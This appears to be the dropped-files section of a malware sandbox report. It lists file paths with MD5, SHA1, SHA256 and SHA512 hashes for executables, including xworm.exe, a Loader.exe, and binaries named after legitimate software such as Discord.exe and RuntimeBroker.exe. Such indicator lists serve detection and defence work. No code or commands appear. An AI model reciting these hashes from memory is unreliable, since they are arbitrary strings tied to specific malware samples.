SHA1 78f91f9f9ffe47e5f47e9844bd026d150146744e
SHA256 1b05c4d74e0d17a983f9b91aa706a7a60f37ec270b7e2433d6798afa1c7be766
SHA512 70e9ab0e49b4bf89505f16c499538daebc1e8da72488cd63ff60747d15a1d486ba38802b0622c9240d10ff68ab32e6bb36a0b809e7cd0e2ec4945d023ce86c5c

C:\Users\Admin\Desktop\4363463463464363463463463\Files\xworm.exe

MD5 f25ef9e7998ae6d7db70c919b1d9636b
SHA1 572146d53d0d7b3c912bc6a24f458d67b77a53fe
SHA256 7face24db4aa43220ebc4d3afb6c739307f8b653c686b829fb1cb6091695c113
SHA512 d8682cdb5876f9ffe6aa8856d5ffa8c168afd25fc927781d80d129491fa04aabf045f01d13ffb51e3db9773367cc00fce466e1ef7af11bfc3d7af13df06cc17c

C:\Users\Admin\Desktop\New Text Document mod.exse\a\888.exe

MD5 b6e5859c20c608bf7e23a9b4f8b3b699
SHA1 302a43d218e5fd4e766d8ac439d04c5662956cc3
SHA256 bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075
SHA512 60c84125668bf01458347e029fdc374f02290ef1086645ae6d6d4ecadccb6555a2b955013f89d470d61d8251c7054a71b932d1207b68118ad82550c87168332c

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe

MD5 4d58df8719d488378f0b6462b39d3c63
SHA1 4cbbf0942aeb81cc7d0861d3df5c9990c0c0c118
SHA256 ecf528593210cf58333743a790294e67535d3499994823d79a1c8d4fa40ec88d
SHA512 73a5fea0cf66636f1f7e1cf966a7d054e01162c6e8f1fc95626872d9e66ea00018a15a1b5615f5398c15316e50bf40336c124c7320b1d66893c1edb16c36b738

C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe

MD5 eaef085a8ffd487d1fd11ca17734fb34
SHA1 9354de652245f93cddc2ae7cc548ad9a23027efa
SHA256 1e2731a499887de305b1878e2ad6b780ff90e89bc9be255ae2f4c6fa56f5cf35
SHA512 bfda0cb7297d71ad6bf74ec8783e279547740036dd9f42f15640d8700216cdd859b83cc720e9f3889a8743671b4d625774f87e0d1768f46d018fccaf4dbef20e

C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe

MD5 d4a8ad6479e437edc9771c114a1dc3ac
SHA1 6e6970fdcefd428dfe7fbd08c3923f69e21e7105
SHA256 a018a52ca34bf027ae3ef6b4121ec5d79853f84253e3fad161c36459f566ac2b
SHA512 de181dc79ca4c52ce8de3abc767fbb8b4fd6904d278fa310eee4a66056161c0b9960ef7bebf2ebf6a9d19b653190895e5d1df92c314ca04af748351d6fb53e07

C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe

MD5 aeb9f8515554be0c7136e03045ee30ac
SHA1 377be750381a4d9bda2208e392c6978ea3baf177
SHA256 7f671b0f622d94aebf0c6ab2f021b18e1c60beda819bc48c0b2c6a8f5fdd7e02
SHA512 d0cfc09d01bd42e0e42564f99332030ed2ff20624bfd83a3f1bb3682fe004e90d89539f5868bba637287795e2668dd14409e2e0ed2ea1c6982c7ce11db727bb4

C:\Program Files\Windows Media Player\graph\graph.exe

MD5 7d254439af7b1caaa765420bea7fbd3f
SHA1 7bd1d979de4a86cb0d8c2ad9e1945bd351339ad0
SHA256 d6e7ceb5b05634efbd06c3e28233e92f1bd362a36473688fbaf952504b76d394
SHA512 c3164b2f09dc914066201562be6483f61d3c368675ac5d3466c2d5b754813b8b23fd09af86b1f15ab8cc91be8a52b3488323e7a65198e5b104f9c635ec5ed5cc

C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe

MD5 aa7c3909bcc04a969a1605522b581a49
SHA1 e6b0be06c7a8eb57fc578c40369f06360e9d70c9
SHA256 19fcd2a83cd54c9b1c9bd9f8f6f7792e7132156b09a8180ce1da2fe6e2eeaaab
SHA512 f06b7e9efe312a659fd047c80df637dba7938035b3fd5f03f4443047f4324af9234c28309b0b927b70834d15d06f0d8e8a78ba6bd7a6db62c375df3974ce8bd0

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe

MD5 3ba1890c7f004d7699a0822586f396a7
SHA1 f33b0cb0b9ad3675928f4b8988672dd25f79b7a8
SHA256 5243e946c367c740d571141cdbc008339559c517efaf3061475a1eced7afaed2
SHA512 66da498ce0136c20c9a6af10c477d01b2fe4c96fe48bb658996e78c249f3e88dc1fda2f60f78106a0b967de4c95698b2cb9983d1a599e67753223d915116189d

C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe

MD5 aa002f082380ecd12dedf0c0190081e1
SHA1 a2e34bc5223abec43d9c8cff74643de5b15a4d5c
SHA256 f5626994c08eff435ab529331b58a140cd0eb780acd4ffe175e7edd70a0bf63c
SHA512 7062de1f87b9a70ed4b57b7f0fa1d0be80f20248b59ef5dec97badc006c7f41bcd5f42ca45d2eac31f62f192773ed2ca3bdb8d17ccedea91c6f2d7d45f887692

C:\Users\Admin\Desktop\New Text Document mod.exse\a\ScreenUpdateSync.exe

MD5 d88e2431abac06bdf0cd03c034b3e5e3
SHA1 4a2095690ba8f1325dd10167318728447d12058a
SHA256 4d37939b6c9b1e9deb33fe59b95efac6d3b454adf56e9ee88136a543692ea928
SHA512 7aa5317dcdf4343f1789e462f4b5d3d23f58e28b97c8c55fc4b3295bf0c26cfb5349b0a3543b05d6af8fa2bc77f488a5ece5eaaceaf5211fa98230ea9b7f49a7

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe

MD5 1f8e9fec647700b21d45e6cda97c39b7
SHA1 037288ee51553f84498ae4873c357d367d1a3667
SHA256 9c110c0426f4e75f4384a527f0abe2232fe71f2968eb91278b16b200537d3161
SHA512 42f6ca3456951f3e85024444e513f424add6eda9f4807bf84c91dc8ccb623be6a8e83dc40a8b6a1bc2c6fd080f2c51b719ead1422e9d1c1079795ec70953a1ad

C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe

MD5 21a8a7bf07bbe1928e5346324c530802
SHA1 d802d5cdd2ab7db6843c32a73e8b3b785594aada
SHA256 dada298d188a98d90c74fbe8ea52b2824e41fbb341824c90078d33df32a25f3d
SHA512 1d05f474018fa7219c6a4235e087e8b72f2ed63f45ea28061a4ec63574e046f1e22508c017a0e8b69a393c4b70dfc789e6ddb0bf9aea5753fe83edc758d8a15f

C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe

MD5 4489c3282400ad9e96ea5ca7c28e6369
SHA1 91a2016778cce0e880636d236efca38cf0a7713d
SHA256 cc68b1903e22d22e6f0a29bcdf46825d5c57747d8eb3a75672a4d6930f60fe77
SHA512 adaeab8aa666057ff008e86f96ae6b9a36ff2f276fdd49f6663c300357f3dc10f59fac7700bb385aa35887918a830e18bddaa41b3305d913566f58aa428a72b0

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe

MD5 bedd5e5f44b78c79f93e29dc184cfa3d
SHA1 11e7e692b9a6b475f8561f283b2dd59c3cd19bfd
SHA256 e423c72ea1a279e367f4f0a3dc7d703c67f6d09009ed9d58f9c73dac35d0a85c
SHA512 3a7924196830b52d4525b897f45feb52ec2aca6cd20437b38437f171424450fd25692bd4c67ccde2cf147f0ed6efcef395ea0e13b24f0cf606214b58cf8284de

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 d875df73e088f73e2184a25d9f306953
SHA1 db23a960077c763599f493240a8891f32e4a02d2
SHA256 93d563d84b4cfa1b6814510eff9edfd6f50895d2daee82c0c77546e09af3d6e5
SHA512 f767fca1d6ac4012a0c8bff0ea64215a7c22304938343a36eaa3da816eab84efd510101af7ce778a7c756db26e51f03bb4d9ee77dd243d5baf71c41dec4aecc8

C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe

MD5 7ae9e9867e301a3fdd47d217b335d30f
SHA1 d8c62d8d73aeee1cbc714245f7a9a39fcfb80760
SHA256 932cb7b1080180487be4b5754bd92600409bafda80d412018a792a8930c6a46c
SHA512 063648705e1817a1df82c9a595e4bbe8e0b1dbb7e31a6517df59905ebe7f22160f4acb55349d03dfe70744a14fd53c59a4c657c7a96646fcccf1c2214fc803dd

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 f2a6d712202f3372aa14b08df18c5746
SHA1 8dffb481433b14f5b1d18576d976002f264da3fe
SHA256 926155f84e029905ad6b6003640d1eb1b3187356e87fde0bc03e9071bcf28124
SHA512 664de7bd7a51839e2121fb598a4c0e6ba287b8a7ee1c94e4bd35992c53530e7634725a4b41039dafba78872aaadfe9e424f17a0a0d89ec350186f70a43874ddb

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 b7334b32575b4eb3e6ca7d7e18d40b95
SHA1 5fcdd7fc28fec14cc9b1e1b55838dd06edbb7823
SHA256 6e4ff1d8fb2785a7290c83869e5cc6c9650d8b5e18ea09dcd5822b3dc64755e6
SHA512 e4ca4eaaa78ce0ec1939959948860817af63c972900d2025655ebc3ce6636e0a38dd8b1c1402fefa3e510e46543c035da6eb81ebe0dd030699805de3d19aa615

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe

MD5 e9a138d8c5ab2cccc8bf9976f66d30c8
SHA1 e996894168f0d4e852162d1290250dfa986310f8
SHA256 e63b41bfdd3a89b6ebcfc05db158fdc399dbc081e49b01498831a62df34defc3
SHA512 5982fc759c8b1121ab5befaac53e1521931f06d276140195fa1fcbcd1069f546253e366ef4cc37245b3bc2ed60c4b8d0583f133a1264efd77938adf456a08ccc

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 23b610453b906b379aa1378dc3f63851
SHA1 989e5c6704eedc6a9b1090d055c877f26a45e127
SHA256 8ae6dcd63b254c835053c5dbaedb240ba0095f240677c93fb4fe0e4d048c7a1e
SHA512 b5b7cc08c736fecf214e36d831d7fe85221503b559ba98b795840a0e67eb0deb219a559bef33dc7245f0cc771412338ef7b21e804d6ee6de5e1a612389d79a73

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 f2d587fb5cce9f7abff2a247bf1f4055
SHA1 2d2a1bcb66197b820093cbb0c55cde53dca8a267
SHA256 8dd18881efc3dacab0fa8273519d7f083630d1e9b0ec2b5db5bcf7231f79e2aa
SHA512 cc93b5a9d0fb3ef5581e3b434685b75082663ad1cd99e4f68255d9761bb3560e4f5a257534c6c165f628dea577dd92c1363f3403e3e1483f2cb92ba32d1758f1

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 51f4c8da03bbab1b3d5d980f220e4cb7
SHA1 5b738e48459af58a1761e97cc13480f578868439
SHA256 3b4d62edd5b89c949b4ca9d8e0ad541f849e28dff34ebd490ab29de43e64b6ef
SHA512 53fecb4a0920a27fe306d7ecbf0caa24e4749dca6427fbd9135018e48055979ec2f1c41fdcf8c0dbf9089379d9d3da8c2f4f7aa3cb16cfaf054ba927ac3c9c30

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 7071376797f74183787bb675f76f19f0
SHA1 b699cc00e2bb8f3044ae8769151daf5224a5bd11
SHA256 063c816aa825cc8838a3fa60cc5ae14c6498904c5135e154ac221f142f29f004
SHA512 4554e088051170c8156f740863fbd95302a0d6eec5b6e9bfe23d3ff465606708e2af853a9bb3502e32d1471744cb6e199e9a04bebe446e19396a117b6bba929f

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 21d3f0579f44e37424c87fbb4a31a5cc
SHA1 22a000fc0d984903b8a3eae54858d03f815e4a1c
SHA256 7326edddd6950df323a8114cc4166e13c135a0889c63ecedbb564b62bf6983a3
SHA512 b3bfb8754e77702d824301644361d7beb3ab613ffdb3f9e4afc83d0057f4aea8955021dbe36d9d7061b6695b76ffefa049255f7132656e21fea0a60645fe048d

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 1a6b79fb9b811768f2c066d7b0f5a88b
SHA1 96fc8b08183b5874896f7aaf08507060b2f83113
SHA256 00b9f0f407e29ef59ae9ee0e3edb2784d203c6378e87ba113c69df65b12ec456
SHA512 9db3a41aa1c9211c371d62e742816ebc44cf6ae2076530229306f10ec5ab0a0fc98be3e1f97fca4b5ededaf94bc221a652ba225ecc546b1f6085ddba27c1ad8d

C:\Users\Admin\Desktop\New Text Document mod.exse\a\neofindsetup.exe

MD5 f51d5ee4178228fc8282e0a3dae84860
SHA1 c2c768c6f5d3feafa37864d4363e97910086f44d
SHA256 ab66fb52ab23e136dd294b2637707d7edd2c02f88d20c7ff5884ae2966a83a44
SHA512 528ea823361dc1d0b9678593783d6165a8c420cb4a89e1842b5e4fad290e7722d391dcf202e9122fb70187b7d6e9cc4550f16ea8eba518ac9f6e30615f069105

C:\Users\Admin\AppData\Local\Temp\MSIA5DC.tmp

MD5 39415f3ea0e75203e7de8dfc6f05d28e
SHA1 2b859a319033eb6a32bd41b1636af23177050173
SHA256 7751e2d1cd2af8798eb1273bccab5ab61c1a7c99573aaf8e6f511e1de8393360
SHA512 28e29088e584090063ba90f0b39c1a26a77da7a35c84625f6af900b91598a16c2f98c511f4edd73211ecbffd2a23273b661e0e0ce1d189ca2712f2f5b83bd343

C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe

MD5 732746a9415c27e9c017ac948875cfcb
SHA1 95d5e92135a8a530814439bd3abf4f5cc13891f4
SHA256 e2b3f3c0255e77045f606f538d314f14278b97fd5a6df02b0b152327db1d0ff6
SHA512 1bf9591a04484ed1dab7becb31cd2143c7f08b5667c9774d7249dbd92cf29a98b4cabfa5c6215d933c99dc92835012803a6011245daa14379b66a113670fbb08

C:\Windows\AB9511B1EE52494CA9BAED6A1536F012.TMP\WiseCustomCalla3.dll

MD5 7e51f18024f4724408fb91f911cd0a44
SHA1 8a705fa5a840d3fa54d4884f4acb3bea55330c91
SHA256 b79493d5687c7d80c5af5c65920736f416a2c9de961d409087b67db74e70be29
SHA512 abbc60ea30453651b6a013cf0c86f02f27ecf748a802df2e9aea7b8dde47cb3587f6d5ef563f9078ca5acc18d45d18ee8f9eeb42c30b046a6eb107f3a3b8e650